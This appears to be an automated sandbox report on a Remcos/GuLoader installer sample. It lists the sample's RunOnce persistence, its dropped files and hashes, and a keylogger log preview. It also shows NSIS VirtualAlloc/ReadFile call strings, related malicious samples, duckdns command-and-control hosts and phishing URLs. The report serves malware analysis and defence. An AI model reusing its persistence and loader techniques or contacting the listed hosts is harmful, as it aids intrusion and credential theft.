• Execution Graph export aborted for target IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, PID 1076 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:19:30 | API Interceptor | 210x Sleep call for process: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe modified
07:18:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe
07:19:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.169.69.26 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | yuya0415.duckdns.org:1928/Vre
192.169.69.26 | confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | http://yvtplhuqem.duckdns.org/ja/ | malicious | Unknown | yvtplhuqem.duckdns.org/ja/
192.169.69.26 | http://fqqqffcydg.duckdns.org/en/ | malicious | Unknown | fqqqffcydg.duckdns.org/en/
192.169.69.26 | http://yugdzvsqnf.duckdns.org/en/ | malicious | Unknown | yugdzvsqnf.duckdns.org/en/
192.169.69.26 | &nuevo_pedido#..vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | transferencia_Hsbc.xlsx | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | http://www.secure-0fflce-o365.duckdns.org/ | malicious | Unknown | www.secure-0fflce-o365.duckdns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
odumegwu.duckdns.org | CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | Remcos, GuLoader | 143.244.46.150
odumegwu.duckdns.org | rIMGCY46473567583458675867864894698467458.exe | malicious | Remcos, GuLoader | 143.244.46.150
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SUPERHOSTING_ASBG | 0GuwV0t2UU.exe | malicious | FormBook, GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | 0GuwV0t2UU.exe | malicious | FormBook, GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | Rob.Kuster@stonhard.com.zip | malicious | HTMLPhisher, Mamba2FA | 185.45.66.155
SUPERHOSTING_ASBG | zip file.zip | malicious | HTMLPhisher, Mamba2FA | 185.45.66.155
SUPERHOSTING_ASBG | 450707124374000811.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | 450707124374000811.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
SUPERHOSTING_ASBG | Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
WOWUS | dceafff25f376bd3883f15c500fbfe369b45821fdbb0e.exe | malicious | Nanocore | 192.169.69.26
WOWUS | qy8i3kM2Ir.exe | malicious | GuLoader, Remcos | 192.169.69.26
WOWUS | Switzerland Clients Pax4.exe | malicious | Remcos | 192.169.69.26
WOWUS | D786UcYWOs.exe | malicious | Remcos | 192.169.69.26
WOWUS | Qc238InLS3.exe | malicious | Remcos, DBatLoader | 192.169.69.26
WOWUS | 17308803849407ff3cbe5ee21edb8fae9eea59dcec4bd1d0263a367346f607736e04b16058533.dat-decoded.exe | malicious | Remcos | 192.169.69.26
WOWUS | 1730880186ecae67588d8fe3bd5f8e7a4af4400ff7eccf3ad632a155a62b884ab04b24e2a4635.dat-decoded.exe | malicious | AsyncRAT, VenomRAT | 192.169.69.26
WOWUS | CDT.ps1 | malicious | AsyncRAT | 192.169.69.26
WOWUS | Reservation Detail Booking.com ID.bat | malicious | AsyncRAT | 192.169.69.26
WOWUS | 17305370455ddd9f41fcc9d1469d95fbed5a87a8d85a167a3e72e33b51453c780336bca79f314.dat-decoded.exe | malicious | AsyncRAT, DcRat | 192.169.69.26
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | fefbBqMKcU.exe | malicious | CredGrabber, Meduza Stealer | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | yh5At5T1Zs.exe | malicious | CredGrabber, Meduza Stealer | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | #U017diados#U0165 o cenov#U00fa ponuku_11-12-2024#U00b7pdf.vbs | malicious | GuLoader | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | Solicitud de presupuesto 12-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | Document BT24#U00b7pdf.vbs | malicious | Remcos, GuLoader | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | nvxdbat.dll.dll | malicious | Latrodectus | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | 63#U2467.hta | malicious | Unknown | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | SK #Uacac#Uc801#Uc694#Uccad_#Uc6b8#Uc0b0#Uacf5#Uc7a5#U00b7pdf.vbs | malicious | Remcos, GuLoader | 91.196.125.125
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 91.196.125.125
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | CEBI Order_ tlumaczenie dokumentow dostawy do CEBI PL11.10.24Frakoblet.exe | malicious | Remcos
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | Remcos, GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | rIMGCY46473567583458675867864894698467458.exe | malicious | Remcos, GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe | malicious | GuLoader, Remcos
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | rNuevo_Pedido_129149.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | rNuevo_Pedido_129149.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | zamowienie.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | zamowienie.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | HJEbEB40vP.exe | malicious | GuLoader
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):156
                                      Entropy (8bit):3.400722866085902
                                      Encrypted:false
                                      SSDEEP:3:rhlKlfQlfVlPUlfKld4b5JWRal2Jl+7R0DAlBG45klovDl6ALilXl:6lfQlHslClCb5YcIeeDAlOWAAe3
                                      MD5:A4D4150BC786E9F3964B57011A3C02A8
                                      SHA1:D9AA7CC1054A819579F3A4DD60884441ACE5D062
                                      SHA-256:C55BCFD354EB570B7CA86541FF69FD7C42057C770C7764F9DAE8E0615AA62E6D
                                      SHA-512:7225E233DD2CAD86B6CE7AAEC377ADC207A6E3ED3A9423FFDBB4071DB550A3CFC230233FE204F3FDC193BC32F290417C50F05A24360498E9BEC8168280E840F5
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                      Reputation:low
                                      Preview:....[.2.0.2.4./.1.1./.1.3. .0.2.:.1.8.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):56
                                      Entropy (8bit):4.250903860294566
                                      Encrypted:false
                                      SSDEEP:3:sAAEVvjsiD84n:fLb
                                      MD5:5974087856E59BA1B1D228E39D15591A
                                      SHA1:43555CD275094990A54289FCA083E1F9E14AB8C7
                                      SHA-256:9D118DC7D563043A8EC352F7112AF2EAC3EBFFD11258E4924533FF4FD00BB771
                                      SHA-512:876D36CB1B3A22CD0686D04FD0830B7C15B67C4003D9C2CD67496D3F726B72544E64F9CD94BCD951C8EBA9E74CB1E2AAA0638552FD82BC5BDB547A6E28950082
                                      Malicious:false
                                      Reputation:low
                                      Preview:kernel32::ReadFile(i r5, i r1, i 58015744,*i 0, i 0)i.r3
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):4.256564762130954
                                      Encrypted:false
                                      SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                      MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                      SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                      SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                      SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:user32::EnumWindows(i r1 ,i 0)
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.483822629187616
                                      Encrypted:false
                                      SSDEEP:3:sEMBQEJkJVEjDzdWxQoXUn:UWxvUn
                                      MD5:953EC092C39A753076F7BA3888679925
                                      SHA1:A658DB8C80E2175C08E026D20AE06DACDFC7E100
                                      SHA-256:46D1E26793406453E0DF203BBBF7A964247E33DC6C5A9D842A41ACEE70755E9D
                                      SHA-512:EA1730869E58239FD68489649305D5324DAC06ECC00B4F19BD4DC4C4138865F7A5948307FA33B6E69136B20B4D934E2EC01B8A7CD75F056E09FE738F0CA27C39
                                      Malicious:false
                                      Reputation:low
                                      Preview:kernel32::VirtualAlloc(i 0,i 58015744, i 0x3000, i 0x40)p.r1
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):52
                                      Entropy (8bit):4.0914493934217315
                                      Encrypted:false
                                      SSDEEP:3:sBa99k1NoCFOn:KankVg
                                      MD5:5D04A35D3950677049C7A0CF17E37125
                                      SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                      SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                      SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):5.744994954995265
                                      Encrypted:false
                                      SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                      MD5:12B140583E3273EE1F65016BECEA58C4
                                      SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                      SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                      SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: CEBI Order_ tlumaczenie dokumentow dostawy do CEBI PL11.10.24Frakoblet.exe, Detection: malicious
• Filename: DEMASI-24-12B DOC. SCAN.exe, Detection: malicious
• Filename: CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe, Detection: malicious
• Filename: rIMGCY46473567583458675867864894698467458.exe, Detection: malicious
• Filename: RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe, Detection: malicious
• Filename: rNuevo_Pedido_129149.exe, Detection: malicious
• Filename: rNuevo_Pedido_129149.exe, Detection: malicious
• Filename: zamowienie.exe, Detection: malicious
• Filename: zamowienie.exe, Detection: malicious
• Filename: HJEbEB40vP.exe, Detection: malicious
                                      Reputation:moderate, very likely benign file
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):3.9637832956585757
                                      Encrypted:false
                                      SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                      MD5:16D513397F3C1F8334E8F3E4FC49828F
                                      SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                      SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                      SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                      Malicious:false
                                      Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):731660
                                      Entropy (8bit):7.930916861083211
                                      Encrypted:false
                                      SSDEEP:12288:E3cAEjowqtlkCSN+RgfcWNQDw9HSAcQ4A5uKrQrxco0+tNADhZebeEkOP:E3cAEjowDCC+R7ab9HSzJWoV07fDW
                                      MD5:A03DCB82D6ECAAB34CC6AE971A806C06
                                      SHA1:3BF367387AD278B154BD2AF42E7BEDF0F8676F6C
                                      SHA-256:4FC786009AD36DED81DFBD863802B06436B718112C35A505D447F6E0D31CBF8D
                                      SHA-512:A11A2C0E59CD229D6D8DE8EDB4322CA434E5931EF94BB1CF4C5435E891125CA8C0518A675277C36936FF47E71EAB7954CE17AAA36ABB0109CBF84087E9652352
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 29%
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):70484
                                      Entropy (8bit):1.2548606107026976
                                      Encrypted:false
                                      SSDEEP:384:lVBk+mR+atFzygIkeailVBDgEmFUUbuTKZGxjRTtzj3ZkyK+8S11cFgQ65dot:Z++arrkavEmEgORTt3ms8Emd/
                                      MD5:798AB22DA8AE95CED1F8739AF1A02DCC
                                      SHA1:8426A4170A177A4A0C4C426DC5A9AC4701E4E121
                                      SHA-256:432BF73DB986527C23F8CCA77B14EB4EF071D72EBDD6EEEFA9CA79DFF48049E6
                                      SHA-512:2B661375F22A3547DE746483078E1AE58EC01D57DE322C995C72ADE9013FEED8CA6FEC360B2A1DFB2050E0F35EB603161EFD6D0CB64B43EEF9D00CDC19849C9C
                                      Malicious:false
                                      Preview:L...................................................j.............................m.........6.................l...........................................Q......................;...................................................t...................6......`..............".........................$.............^.....................L................................................/$...9...............................7.....................{............................................................*.............1...................................?..............&..V.......................................b......................................,.......X......................................................................................................!..............x.................q......................................?.............................N..:....................J.......$........3..................................z..9.........................................................
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):136260
                                      Entropy (8bit):4.597341085882072
                                      Encrypted:false
                                      SSDEEP:3072:UFVF0JHPi5oGXoKZiTd6Rsadh2e+4dcvdN:OVaJHPi7/s8hb+FN
                                      MD5:36F112976788D4FB05E4649672BBACEC
                                      SHA1:9D3180DB01A7D2F6F76B941EF2D6080ADBE15B62
                                      SHA-256:2B2742E30B5D567B7132CA555865C129AD6C62820E2DF847247BE761DA8C586B
                                      SHA-512:0F6F5B01463AF91D9772E83C950948856F25FBEB32145C7567B5DBBFC43B8E4D7101EB0383F8262203CF9C0598C88DC42B08C0D6E9875A1BFDE666E66591022B
                                      Malicious:false
                                      Preview:..v..............j............P.eeeee............N....................nnn........))).....444.........PP.%%%........>>........................FF.............iii..W.....W...................4...`.______......ww.......uuu.&&......................6.......e...........@@......;;... .4........ ...........>>>...............K.C........................>.....................M......;...)))......V.........VV.........%....y.......hh.(................f.......LL...uu.9..z..........\\...eee..............o.33..................AA............~~..C..<........11...'.((((....................dddd....{....AAAA.......]...............................OO.LL...JJJ....8..TTT...y......g............}....."""......11111................""..............XX...........!!!.......XX.xxx..}}}}....u..T.............................................D..^..........................77.(.rr.!............S...ooo.V.......f._.%............................................))......{..;.............dd..||||.........EEEEE...........IIII..XX.W
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):448873
                                      Entropy (8bit):7.111393709973377
                                      Encrypted:false
                                      SSDEEP:6144:Eb1q3t7HRKlEMrYWov3wxBrt0IAD6vt+F5LshyEVqDoFc+hxgkQQ:wY1KlVY5sOogLshyEUMtn1QQ
                                      MD5:3550BF03E622E28FEF525EE0182339E8
                                      SHA1:0766B2208E92DC0197139EBC305DD136B4E857FE
                                      SHA-256:D1A4CB00AFE4B7B66BDB8D3D31055EF5769877612F34A951278376DAEA93805D
                                      SHA-512:7C0340FBD785741049960324216DD517C664169CCDA9DF98E528EB7BA2EDA662CC28D26361DF7CEA644B21B6912A2554917DBC587980909ABC51AF7F64BFAC3B
                                      Malicious:false
                                      Preview:..e..................R......kk.&.............DDDD............d..%%%......................j............>>..Y........s....j........LLLLLL........].K...6.........WW..A................^^..^^........RRRRRRRR.5.............................w....a..]........*......U..........h...^......TT......................'..uu...............888.....8................................''.A.......~...**.................--..&&......H....==..KK...o.GGG....H...............p..............||.CC.....................www............gggg.7.......Y.....W...............2...///.>.................CC....bb....00...zz...............00.O.[[.H.A.x............................=...............C..................DD...........qqq.G............................33...XXX.....ww....o.....................................C..............N..CC....................vv.........RRR...AAA...n.........(....66..........1...........................L............n...Q.............0................{{{...........}}............................"..........
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):330423
                                      Entropy (8bit):1.2491650618704468
                                      Encrypted:false
                                      SSDEEP:768:Y79V/7OdtU411IL9myi/wAvxcYxq2pDQ4kfWk+MM8AyLAJMu8k/M+UpORLf/zbW+:AmR8uZrxN50Hf9oLa6beGalDQvPbTmeR
                                      MD5:EF4261DCD04F77611A3A1DE40343A71C
                                      SHA1:EB75467B507B7A7F9F452D08A79BB13F428FFBB7
                                      SHA-256:A2F3FBF7C7B9DCF49BB018DE89D1259F2F21F77BBC540FF0DD3BA492CF416E7C
                                      SHA-512:C2CFBBB02D691F9EB2FEB5E3633A6528CC3E5359955EAA1816C33023487E533855E55403B649560AA8580BAE33A682969059CC55C9D446F6B8AB02EAC658ACC9
                                      Malicious:false
                                      Preview:...O..........b.................................................................................C........e..D................................................................................................J...........................U........i......}......................s..............?...............7......................................G.........g.............................e......................!.................................:.......................p....................................s....p.............n..............................S...............................?~.............w.|..m................................p...................................................k..............W..................................X...v....................................,.......................................................>................v1.................................q....................................!............................................................................
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", progressive, precision 8, 721x800, components 3
                                      Category:dropped
                                      Size (bytes):13421
                                      Entropy (8bit):7.136747769977594
                                      Encrypted:false
                                      SSDEEP:192:L866d5e0AK3IjMPGSvsp8ZJ/NnckKY/Z9rPvxzoHA3ozBt:Ys0PGSQ8TNncE/ZlPJCt
                                      MD5:B358902DF060EB04DA3D7206E2B88672
                                      SHA1:68819B5957EFAC558A1F820DA654776320935574
                                      SHA-256:6807B137577B302E64D2543DF37423B1F68E2D71A0AE4872188CDBB58EA2CFED
                                      SHA-512:9E857FFA049594C298300843733FA1623B5F3D9513B8B002241FAC2654C7C82EBB521BC4D3049174D3B78F5915D475524A5313FA528EC81AFFFAA27EF81174BB
                                      Malicious:false
                                      Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90....C....................................................................C....................................................................... ...."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d.d"..................................+..S[s~.o.<w.z..,.....A.Y>(.3.Z..D............................K......-r6E._.\...e...l
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):430622
                                      Entropy (8bit):1.250752905027708
                                      Encrypted:false
                                      SSDEEP:1536:CRmfXIjyuE98wkdKqICS5tmiaKMZHiBawc+:f1u+ZUICCm31kDR
                                      MD5:6C0764C7CFB218DBF0ECB687260B0BA1
                                      SHA1:1CA4841BDA7351E92BFBCA3B6952F23EFF8B61B7
                                      SHA-256:AD2B53F491F7294B54DB434ED67867FC6B0C962D987F20918FF0E33A06F53C55
                                      SHA-512:9CB5D6DB23239DAFC1117D1DAEF7978EC528E37094588516B0B93F028352773BC5BCA3C89DBC0E6D8AB728F8BD1C5A6104748B1535C1B83D71A814052DE0373A
                                      Malicious:false
                                      Preview:.P.....................................;.....................................................m.......K.......v..................................]...............................................9.....................................................................d...5.Y...............................................].........C................9...r............................................................................9.................4.......................&@...............}.......................................D..................;...................................t....f............P.X.........................................................dz....e......<................................3...........J........................................................D......................5........D........................................... .........................................>............................>.......x..i........b.................\.".................../.....................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.930916861083211
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File size:731'660 bytes
                                      MD5:a03dcb82d6ecaab34cc6ae971a806c06
                                      SHA1:3bf367387ad278b154bd2af42e7bedf0f8676f6c
                                      SHA256:4fc786009ad36ded81dfbd863802b06436b718112c35a505d447f6e0d31cbf8d
                                      SHA512:a11a2c0e59cd229d6d8de8edb4322ca434e5931ef94bb1cf4c5435e891125ca8c0518a675277c36936ff47e71eab7954ce17aaa36abb0109cbf84087e9652352
                                      SSDEEP:12288:E3cAEjowqtlkCSN+RgfcWNQDw9HSAcQ4A5uKrQrxco0+tNADhZebeEkOP:E3cAEjowDCC+R7ab9HSzJWoV07fDW
                                      TLSH:96F42311FEA6D8F5E46B64F1993267B58AE3AC68B72173930310B98E3CB3547410F262
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                                      Icon Hash:981b293d37203cb4
                                      Entrypoint:0x4033d8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:671f2a1f8aee14d336bab98fea93d734
                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000224h
                                      push esi
                                      push edi
                                      xor edi, edi
                                      push 00008001h
                                      mov dword ptr [ebp-14h], edi
                                      mov dword ptr [ebp-0Ch], 0040A188h
                                      mov dword ptr [ebp-08h], edi
                                      mov byte ptr [ebp-04h], 00000020h
                                      call dword ptr [0040809Ch]
                                      mov esi, dword ptr [004080A0h]
                                      lea eax, dword ptr [ebp-000000C4h]
                                      push eax
                                      mov dword ptr [ebp-000000B0h], edi
                                      mov dword ptr [ebp-30h], edi
                                      mov dword ptr [ebp-2Ch], edi
                                      mov dword ptr [ebp-000000C4h], 0000009Ch
                                      call esi
                                      test eax, eax
                                      jne 00007F6064AF3F71h
                                      lea eax, dword ptr [ebp-000000C4h]
                                      mov dword ptr [ebp-000000C4h], 00000094h
                                      push eax
                                      call esi
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jne 00007F6064AF3F5Ch
                                      movsx cx, byte ptr [ebp-000000A3h]
                                      mov al, byte ptr [ebp-000000B0h]
                                      sub ecx, 30h
                                      sub al, 53h
                                      mov byte ptr [ebp-2Ah], 00000004h
                                      neg al
                                      sbb eax, eax
                                      not eax
                                      and eax, ecx
                                      mov word ptr [ebp-30h], ax
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jnc 00007F6064AF3F54h
                                      and byte ptr [ebp-2Ah], 00000000h
                                      cmp byte ptr [ebp-000000AFh], 00000041h
                                      jl 00007F6064AF3F43h
                                      movsx ax, byte ptr [ebp-000000AFh]
                                      sub eax, 40h
                                      mov word ptr [ebp-30h], ax
                                      jmp 00007F6064AF3F36h
                                      mov word ptr [ebp-30h], di
                                      cmp dword ptr [ebp-000000C0h], 0Ah
                                      jnc 00007F6064AF3F3Ah
                                      and word ptr [ebp+00000000h], 0000h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0x1a8a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x660c | 0x6800 | 3b90adcd2f1248db844446cb2ef15486 | False | 0.6663912259615384 | data | 6.411908920093797 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1340 | 0x1400 | b3bd9ad1bd1020c5cf4d51a4d7b61e07 | False | 0.4576171875 | data | 5.237673976044139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
